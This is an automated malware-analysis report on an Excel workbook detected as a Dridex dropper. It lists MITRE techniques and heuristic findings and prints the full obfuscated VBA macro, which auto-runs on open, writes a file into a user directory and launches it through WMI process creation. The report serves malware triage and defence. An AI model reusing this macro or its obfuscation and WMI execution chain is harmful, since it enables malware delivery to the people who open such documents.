Verdict: MALICIOUS
Risk Score: 240
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains a Workbook_Open VBA macro that utilizes GetObject calls, a common technique for executing obfuscated code. ClamAV detections explicitly identify this as a Dridex dropper. The macro's obfuscated nature and the presence of multiple unknown URLs suggest it is designed to download and execute a second-stage payload, consistent with Dridex's typical behavior. The file was likely delivered as a spearphishing attachment.
Heuristics (8)

ClamAV: Doc.Dropper.Dridex-9845759-0 [critical] CLAMAV_DETECTION
ClamAV detected this file as malware: Doc.Dropper.Dridex-9845759-0

VBA project inside OOXML [medium] OOXML_VBA (4 related findings)
Document contains a VBA project — VBA macros present

GetObject call [high] OLE_VBA_GETOBJ
Matched line in script:
    AGoC7naD = Join(Array(RnhUc_0mGp_A5p7, XnKjbQS8Tt5kjyfz, "ZbzgSoQCr9G5DNNa EPuP_CMO_p6c_cky5 N5lJt_JxI_Wrvj" & TVznAGfXZcYDsij))
    Set Z0uyTRuCfZG = GetObject(Pdbh_D1y_Xo6X.JEnmks0(SoQuh6S)).SpawnInstance_
    For HVZ6lJX8BD3QrIdy = 0 To CLng(((-1.36514522821577 * -241) Or (-376 - -424#)))

VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Workbook_Open macro [low] OLE_VBA_WBOPEN
Matched line in script:
    Attribute VB_Customizable = True
    Private Sub Workbook_Open()
    RmCf70hcpWRP73vj = Hz38c_5Xym_qMp0_BXu.SB9SS_Eju_hed

Environ() call (env variable access) [low] OLE_VBA_ENVIRON
Matched line in script:
    Next Fuypb_0YHD_G6hL_lfoP
    V0Pd_rph_Reh_coo = Environ(R3U6_ewF_Yaj)
    GGYxcjq06OkXYjA = InStr(G8ldY_dpw_97A_F3G, ovDuidchJpl, ASdAgMySnwfgh2p)

Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Embedded URL [info] EMBEDDED_URL
One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14006 bytes |

SHA-256: c3747d700872a47405aac096e6ca92e3cae25d4c6693a3adb1fcf52538094879

Detection
ClamAV: No threats found
Obfuscation or payload: likely
197 of 355 identifiers look randomly generated (e.g. 'xlCylinderBarStacked100') — consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
RmCf70hcpWRP73vj = Hz38c_5Xym_qMp0_BXu.SB9SS_Eju_hed
Debug.Print WJn42_sM49_Hxh_jkTB
For PA2xlEsJ3DXvM5jD3 = 0 To CLng((1057 And 1467))
DPUefHr = PA2xlEsJ3DXvM5jD3
Next PA2xlEsJ3DXvM5jD3
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Hz38c_5Xym_qMp0_BXu"
Function BZMrmJdv(ejZk_PbyL_NLZ)
TiosBZPU1 = InStr(GNBGd0smh82rL, UioTuCrk1zzbxSSX, qXtlvJx)
For IRtQ_eDE_KaV_fmt = 0 To CLng(((xlDialogAxes - -185#) Or xlDialogPivotFieldGroup))
OE60OhBY1RQd = IRtQ_eDE_KaV_fmt
Next IRtQ_eDE_KaV_fmt
Debug.Print MU2U_3FMU_1USR_0MxY
JFbynv5I2 = CLng((1399 And 1910)) > CLng(((865 - 775#) Xor xlDialogFindFile))
OhVP8KcQFBpGt = Len(Join(Array(B0KFArfoyFUc, JJoe_3VG_aA7_k39 & "xLV64dAL4VvTcy")))
z0pWWETANZv = CLng(((989 + 272#) And 3935)) < CLng(((976 - (268 - -241#)) And 1003))
NlJ1D_wGd_7aM_CbW = CLng(((1636 + -243#) + -336)) > CLng((Not (-0.210526315789474 * (1.3202416918429 * -331))))
BZMrmJdv = Hex(CLng((CLng((50848 Or 60569)) - CLng(((3904 + -160#) Or 6532)) + CLng((1.04854368932039 * 7725))) * Rnd + CLng(((1.08829404714343 * 2503) Or (7725 + 211#)))))
ZTJl_o3Q_HhK_NsX = Len(Join(Array("k4uZ_L9sG")))
VcVH_jP0_C5c = CLng((Not ((-317 + 312.452380952381) * -126))) < CLng((859 - ((0.852012383900929 * -1615) + 807#)))
X8gW93gb0bhRgA = Wmcoyuv
ho9CLs55ZEfrOUMv = "JkHIU_Hts_H8Wt"
Dd0PMZC = InStr(Camp43QqCq0UjBq, ikH97_Bbcp, EQ93_fXa_QXeA)
End Function
Function V0Pd_rph_Reh_coo(R3U6_ewF_Yaj)
MeqSK_arl_RSB4 = Len(Join(Array("FnmI_G8E_19l" & XSx928CD)))
Debug.Print Y4XhZe6dW
For bo0h_3YC_tnAx_nZMz = 0 To CLng((Not ((-1705 - -265#) - -729#)))
NxoW_Crr8_F21m_A53 = bo0h_3YC_tnAx_nZMz
Next bo0h_3YC_tnAx_nZMz
Debug.Print rYTCC00jha
For Fuypb_0YHD_G6hL_lfoP = 0 To CLng((397 Or ((-225 + 202#) + 879#)))
Pqou1jbPQnt = Fuypb_0YHD_G6hL_lfoP
Next Fuypb_0YHD_G6hL_lfoP
V0Pd_rph_Reh_coo = Environ(R3U6_ewF_Yaj)
GGYxcjq06OkXYjA = InStr(G8ldY_dpw_97A_F3G, ovDuidchJpl, ASdAgMySnwfgh2p)
Debug.Print R4MP_Mt0R_HYz
xB616_QWb0_T1P = Array(PcQ1vXwac1r9, "Dk0w_IZd1_xjY" & cK9dSafzIXS & "QdE4OnxJFtpzV T5gC_MUnw_VVBf BqHdfxg6dQ2SWws", dx05_aj9q, FnuIOFZ1 & "Oq8T_ZPQA F9LS_U7D_tbrM yqDCna3n7er9GHy" + "ZSkw_VrT_MxFp sQ0a_bjy", "NMqV_KrW_d944_d9C TclVD6OCnV" + "SYl4_ciFe_gFr_QV76 RhbRUKSN7r95OXU F62udq6" + "FI7DB5wlIry9 OVfPQRT ySeebwrgZ0v", "irUC2fqGGXLk PcOas_j9g qXYgl_L0r" & "JFzyq_D8MW FyH7rQMBC j1peHnFtQTsmdls", "WxBzV_CC1_stYH_zvZ3")
U6g5X_dLY_UE8 = t6qn_SjJ_Yog
MoOg6y6PO = FDeM_G2O_f5V_DAw
ApdmU_QUC_5i9_Asw = Join(Array("ASILTOznLTk", "QVuoU_wFTa_rhJz_iMS Sa0WY_4uWC_UAe_gQCa", GNd0j69WoVLXB, ZyVb_MvYs_ARpt_5Woc, HxiN_kmBi_Algm_Nx06 & "IowA_ram_lNkO_8gK odUo_bvO4_7oa_JUpI" & "rY94_np1T_Ruz6", XIislwHF434dh0 ^ znt0Mf3, esTBtyBTmUT))
FLW5n_f7J_Vrk = Array(ujaLlMMHlwb7w & P18N5URvxiX, KIvkGfOv17K & I4nvV_90r)
For SCeONLJu2dsMMgqp = 0 To CLng(((-263 - -518#) And 167))
QgjE_06M = SCeONLJu2dsMMgqp
Next SCeONLJu2dsMMgqp
B05wqFJAGU0 = InStr(R0Fa0hPswrap2dS, EbCU2Jt6Dn0hba, S7M5qIs3V)
End Function
Function SB9SS_Eju_hed()
'bRpS4_NtiY XVQNS_tpND_hUIn_BNWH M7cOYWtkNnKeph C7iY_uXj JxRT_SV4M_H6O QCUwnE99F1HI WGsP_3Gob_MMX5 hLbkO_RjD
Dim lcnpg2yHlUr4zqT As String
lcnpg2yHlUr4zqT = VfA44_ywK.L3YPhPtfX.Text
hCp7_V2bp_NG90_GcC = j0ps_cIn_2Sw & V0Pd_rph_Reh_coo(ZrLs6_0ZaB_a74k_0kS.NIcL6NJqnl) & yU0VS_GtA1 & qgxY_2qZ_CO0.TJf6CQM2OZ(YRZk3_G4Ip_oym) & Q1Ww_BZL_UwC_TwF & EFYs_p3j_vTzU_lfrX & EmHmbvIRX & ZoOpb_A6Z & Hz38c_5Xym_qMp0_BXu.BZMrmJdv(JwC1o_1nNG_ZnJ2) & XPwtV_0AJq_CgQ_T8c & tol9K_IXke_YR3W & qgxY_2qZ_CO0.YnNQrVnZvOuEka(g3gYW_6UCU)
Open hCp7_V2bp_NG90_GcC For Binary As #CLng((-927 + 928))
Put #CLng((xlErrorBarIncludeBoth And xlUnlockedCells)), , lcnpg2yHlUr4zqT
For XPqc_T7n_v4Su = 0 To CLng(((-347 - -850#) And 337))
K1QrCoDM = XPqc_T7n_v4Su
Next XPqc_T7n_v4Su
Close #CLng((962 + -961))
zTjkS_0y1d_DQIT_uKde = ERpGIjHEccQA5W0n.AmVn_wq2(ZF02yuv.e6pZEKMxk(YX7yd_nk2_Our6_Z2w), ZF02yuv.Lmk6_CsDl_crV & hCp7_V2bp_NG90_GcC & Chr(34), X43qPIkn.Z0uyTRuCfZG)
End Function
Attribute VB_Name = "ZrLs6_0ZaB_a74k_0kS"
Attribute VB_Base = "0{6F9081C1-7DE5-4FD8-AEFD-56A7F23F0A3D}{0911A6E6-5228-4BEB-850B-37017A90C107}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function NIcL6NJqnl()
NIcL6NJqnl = Join(Array(ChrW(CLng(((0.98019801980198 * (854 - -55#)) - 794))) + ChrW(CLng((125 And ((-926 - -710#) - -328#)))) _
+ ChrW(CLng((-0.368421052631579 * (-429 + 125#)))) + ChrW(CLng((Asc("d")))) + ChrW(CLng((xlLineMarkers Or xlCylinderBarStacked100))) + Chr(CLng((AscW("t")))) _
+ ChrW(CLng(((173 + 557#) + -633))) _
))
RVsQU9TZAK0QJ0vqS = Join(Array(EYYz_70ap & "FnXj_QYYL_8T0", IuGUo_RUy_FKTh_EyD1 & "YOdP7_jugV QUR83gYc" & "RtQP_yQb", XCUlp_aas_yUY_Qz33, I7DB_1lw_FwTD_Rwx & "ScQ0_aNB"))
AVdj5Pbs = Len(Join(Array(MrGr6_Ml1, TGLy3swEhV5H & "FuiA9xkT0IIkb" & gfbO_j19_u4nW_Ef9u, "vpjQ_mNJ_aIG")))
End Function
Attribute VB_Name = "qgxY_2qZ_CO0"
Function TJf6CQM2OZ(jaqk_z2k)
TJf6CQM2OZ = Chr(CLng(((-244 + -471#) + 807))) _
End Function
Function YnNQrVnZvOuEka(HWGp1dbHVAf)
YnNQrVnZvOuEka = ChrW(CLng((AscW(".")))) + Chr(CLng(((-0.087248322147651 * -149) Xor 117))) _
+ ChrW(CLng((((-4.97321428571429 * -112) - 684#) - -242))) + Chr(CLng((Asc("l"))))
End Function
Attribute VB_Name = "ZF02yuv"
Function Lmk6_CsDl_crV()
Lmk6_CsDl_crV = Join(Array(Chr(CLng((-880 - (-1652 + 653#)))) _
& ChrW(CLng((-653 + 762))) & ChrW(CLng((Asc("i")))) _
& ChrW(CLng((xl3DColumnStacked Xor (675 - 591#)))) _
& ChrW(CLng((xl3DColumnStacked100 And ((-11 + 10.9103773584906) * -424)))) _
& Chr(CLng(((xlListDataTypeChoiceMulti + (-775 - -879#)) Or xlFormatFromLeftOrAbove))) & ChrW(CLng((AscW("s")))) & Chr(CLng((xlPaperEnvelopeC65 Or xlNoRestrictions))) & Chr(CLng((-0.132561132561133 * -777))) & ChrW(CLng(((-1662 + 941#) + (1.47048300536673 * 559)))) & Chr(CLng((Not (-764 - -647#)))) & ChrW(CLng((xlRangeAutoFormatTable2 And (6.47948164146868E-02 * 926)))) & Chr(CLng((xlDisplayUnitLabel Xor 49))) & Chr(CLng((-686 + 788))) _
& Chr(CLng((xlColumnStacked + (577 + -518#)))) & ChrW(CLng(((0.046448087431694 * xlDialogErrorChecking) Or xlPyramidCol))) & ChrW(CLng((Asc("m")))) & ChrW(CLng((Asc("a")))) & ChrW(CLng(((484 + -360#) And 118))) & ChrW(CLng((0.280193236714976 * ((-680 - -514#) + 373#)))) & ChrW(CLng((xlScrollBar Xor xlUnicodeText)))))
Debug.Print TeYITYtIFNPFLtt
DqkLdPFg = JueITC9
End Function
Function e6pZEKMxk(Z0RF_dYZ)
e6pZEKMxk = Join(Array(ChrW(CLng(((795 + -676#) And (0.114724480578139 * 1107)))) _
+ ChrW(CLng((Asc("i")))) _
+ ChrW(CLng((Not ((-7.18725718725719E-04 * 286) * xlDialogChartSourceData)))) + ChrW(CLng((xlXYScatterLines Xor xlExcel7))) _
+ ChrW(CLng((((792 + -791.661333333333) * 375) And xlConeBarStacked))) _
+ Chr(CLng((-0.130227001194743 * (-946 - (0.17986798679868 * -606))))) + ChrW(CLng(((174 - 47#) And (762 - 646#)))) + ChrW(CLng((-0.203180212014134 * (-697 + (0.929078014184397 * 141))))) + ChrW(CLng((AscW(":")))) + ChrW(CLng(((1316 + -550#) + -652))) + ChrW(CLng((xlPaperEnvelopePersonal Or xlXYScatterLinesNoMarkers))) + ChrW(CLng((AscW("o")))) + ChrW(CLng((0.363636363636364 * xlDialogOptionsEdit))) + ChrW(CLng((xlPieOfPie Or xlDialogFormatLegend))) _
+ Chr(CLng(((0.125480153649168 * 781) Or xlLineMarkersStacked100))) + ChrW(CLng(((618 - -179#) + -692))) + ChrW(CLng((((-0.11864406779661 * 590) - 46#) + xlDialogFormatMain))) + Chr(CLng(((0.118421052631579 * 1064) And (-67 - -186#)))) + Chr(CLng((-159 + ((633 - 632.774541531823) * 927)))) + ChrW(CLng((xlPrintInPlace Or (-154 + 196#)))) + ChrW(CLng((-0.171259842519685 * (xlDialogAlignment + -551#)))) _
+ Chr(CLng((xlRangeAutoFormatTable10 Or (7.64635603345281E-02 * 837)))) + Chr(CLng((1035 + -925))) _
+ Chr(CLng(((xlDialogFormatMain + -224.850439882698) * 341))) _
+ Chr(CLng((-676 + (0.476690741956665 * 1523)))) + Chr(CLng((856 + (-1615 + 854#)))) + ChrW(CLng((xlRadarMarkers And xlDialogUnhide))) + Chr(CLng((-865 - -979))) _
+ ChrW(CLng(((512 - 401#) Or xlLowerCaseRowLetter))) + ChrW(CLng((xlDialogActiveCellFont + (xlDialogAddinManager + -698#)))) + Chr(CLng((AscW("e")))) + ChrW(CLng((-437 - -552))) + ChrW(CLng((AscW("s"))))))
Fc7X7qYmSv9Prr = CLng((Not -628)) < CLng((Not (446 - -110#)))
Gqkcp_CLP = "OF4QgkqjY"
End Function
Attribute VB_Name = "VfA44_ywK"
Attribute VB_Base = "0{DC1D0E7D-812F-46FA-BFD2-E6CDEACAF6B8}{7F12ADE6-8F05-48C1-8DD7-5959D9DD3A31}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function uFiW15SGSgI(GRIPUe1D20Ts)
uFiW15SGSgI = Chr(CLng((Not ((-1419 + 899#) + 485#)))) _
End Function
Attribute VB_Name = "Pdbh_D1y_Xo6X"
Attribute VB_Base = "0{444EEEA0-EC0F-42E7-9A90-320C10A1D6A5}{E3D6466D-2564-4A29-AFF9-FF313A5B9C00}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function JEnmks0(KdhWZTxmZ)
JEnmks0 = Chr(CLng((0.228406909788868 * (xlDialogCustomViews - (-729 + 701#))))) + ChrW(CLng((Asc("i")))) + Chr(CLng((xlDialogDefineName Xor xlSurface))) + ChrW(CLng(((467 - 467.145917001339) * (1.32212389380531 * -565)))) _
+ ChrW(CLng((((1578 - 708#) - 798#) Xor xlDialogColumnWidth))) _
+ ChrW(CLng((xlAccounting4 Xor 124))) _
+ ChrW(CLng((116 Or xlDialogFormulaFind))) + Chr(CLng((xlSurface Or (-414 + 462#)))) + ChrW(CLng((-702 + (0.467117393976644 * 1627)))) + Chr(CLng((-687 + 779))) _
+ ChrW(CLng((Not (451 + (-1374 + 808#))))) _
+ Chr(CLng((((-781 + 781.501997336884) * 1502) + -643))) _
+ Chr(CLng((Asc("o")))) _
+ Chr(CLng((xlDrawingObject Xor 122))) + ChrW(CLng((Not -93))) + Chr(CLng(((xlDialogEditboxProperties + -359#) Xor xlMDY))) + Chr(CLng((Asc("i")))) + ChrW(CLng((Not -110))) + Chr(CLng((-433 - -551))) + Chr(CLng((Asc(xlSplitByValue)))) + Chr(CLng((Asc(":")))) + Chr(CLng((898 - 811))) + ChrW(CLng((Asc("i")))) + ChrW(CLng((AscW("n")))) + Chr(CLng(((0.493939393939394 * -330) - -214))) + ChrW(CLng((AscW(xlLeftToRight)))) + Chr(CLng((Not (-555 + 459#)))) _
+ Chr(CLng((-20 - (-866 - (1.79391100702576 * -427))))) + Chr(CLng((AscW("r")))) + ChrW(CLng(((588 - 588.155244755245) * -715))) + ChrW(CLng(((3.70353982300885 * -226) + 936))) + Chr(CLng((Asc("e")))) + ChrW(CLng((AscW("s")))) + ChrW(CLng(((0.20268972142171 * -1041) + (-606 + 932#)))) + Chr(CLng(((-27# * xlParamTypeVarBinary) Or xlPaperEnvelope9))) + ChrW(CLng((Asc("t")))) _
+ Chr(CLng((xlCylinderBarStacked100 Or xlNoIndicator))) + ChrW(CLng(((-745 + 763#) Or xlCylinderBarStacked))) + ChrW(CLng((116 Or xlPaperLedger))) + Chr(CLng((265 + (-1029 - -881#)))) _
+ Chr(CLng(((-265 + 281#) Or xlPyramidCol))) _
IbBMYzq = InStr(XUyGX_HkGr_ob8, PQ0ianmy8sQR, QkcVd_2ZyB)
Debug.Print U72U_tA6y_wMY
End Function
Attribute VB_Name = "X43qPIkn"
Function Z0uyTRuCfZG()
MbYV_krt_7Y0z = "615"
XlY0KorYy6y = "116"
re6L_Jts7_A38j_wnD = Array("LUpbu_N8x_21H0_IvNC BVNJ8_llb", oWmub4Ys)
AGoC7naD = Join(Array(RnhUc_0mGp_A5p7, XnKjbQS8Tt5kjyfz, "ZbzgSoQCr9G5DNNa EPuP_CMO_p6c_cky5 N5lJt_JxI_Wrvj" & TVznAGfXZcYDsij))
Set Z0uyTRuCfZG = GetObject(Pdbh_D1y_Xo6X.JEnmks0(SoQuh6S)).SpawnInstance_
For HVZ6lJX8BD3QrIdy = 0 To CLng(((-1.36514522821577 * -241) Or (-376 - -424#)))
PnQCc_dT7n_iQf = HVZ6lJX8BD3QrIdy
Next HVZ6lJX8BD3QrIdy
BiXRGyvQYtrphvj1 = CLng((((184 - -656#) - 164#) - -377)) < CLng(((697 - -179#) Xor (1683 + 294#)))
JGNy4_Hpf = CLng(((-5.5 * xlDialogFormatFont) - (0.736791546589817 * -1041))) > CLng((0.589894736842105 * (-2362 + -13#)))
For OqTq_M3SS_WGeB_Xcy = 0 To CLng((1460 - xlDialogGalleryDoughnut))
o2LLm2lMRRix = OqTq_M3SS_WGeB_Xcy
Next OqTq_M3SS_WGeB_Xcy
Z0uyTRuCfZG.ShowWindow = CLng((xlWide Xor (-2.81954887218045E-02 * -532)))
TFLMH_8VR = Len(Join(Array("myRohIT9Y55RA JlAnH_Af50 THp0dI63HjP" & DNBzM_teto_VDe_16OO ^ LQt0jvb6Hp, "IA0mi_HN6 Yg40_Cwv_iGXR" + "PxR0_KS7_8Br LFOhP_yIxr_GP0_QxS" & KzPX_FrHm, HKmj8VuB, "UJJjW_tc39" & WErdl_dq81_mNB_EIY, QJpE3IVfK1shC4dT, "ERunLKjS UCemDRSEz9y DnIq_se12_f5C5" & jcEQd_d0A, "Is0FMXn DhBEHuXAr9Vm" & fCCCyeRa & "RJWKb_UIC_OSb Vu1LZ_RfzW", "IBrW58cRw9620vB JeBituMOL" + "RKLn4_j4ll_fuC_ox2R swoCQZT2W He3y4_t16_5Wmn" + "CGp7a_WjI_xDJt_ApTh")))
ScNyDtvsbEOw = "987"
e5lQIjNOErsPoU = Qy582oOJgvEaSTIxv
S1B5ysCLVqAxC = Abs(CLng((Not (267 + 887#))))
nc0Z32S5csIVICF = BznynvtwFTEN2il
For A1NDA_TBw = 0 To CLng((Not (-414 + (748 - 443#))))
Kyg04dZe7M = A1NDA_TBw
Next A1NDA_TBw
End Function
Attribute VB_Name = "ERpGIjHEccQA5W0n"
Function AmVn_wq2(C8ZvOwT6, VnHuIiE2pzcSOmY, UHah_IRoA_ImP)
VJYL_KC5 = BtHRf6Q0s
X0GzZRc8q5a = InStr(nUN8xWFQ0M5j9Ck, JEZwAT3IH, DQmDJ_1Ds_fDtD_STE)
Debug.Print pnY3OvnhSNEFW6x
uMl4QuS1F7iO = "RYhrpptOXIGLzW"
With GetObject(C8ZvOwT6)
Debug.Print TIMO1_g1s1_tgtS
For RQvOaSemypQjFA = 0 To CLng((859 And (xlDialogFilterAdvanced + 571#)))
SPMEFPjF0 = RQvOaSemypQjFA
Next RQvOaSemypQjFA
.Create VnHuIiE2pzcSOmY, Null, UHah_IRoA_ImP
End With
ST9eX7NG5Fkdhu = InStr(Xqja_THHV_zYQ_XKQ, a0dy_jq3_mVZ_Csb, AZVI_r32G_vAp_O2Sx)
'Bbo9X_tm1 UmJw_tvLw ELVd_JylB_WI4_2a6A Kv47_CUi_WNnP GbXC_Tuj FR0RnOaWdzL0Llo7
YDMDwt78NfWFplp = LgARk_EUc_BUm_WjZ
seXRwEIGd = Abs(CLng((((1190 + -888#) + -301.373873873874) * -1776)))
End Function

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 65536 bytes |

SHA-256: c3666b935ea7c8cf60ba97f2f0728b4f54ac2f8157455649d353d14aa0056eff

Detection
ClamAV: Doc.Dropper.Dridex-9845759-0
Obfuscation or payload: unlikely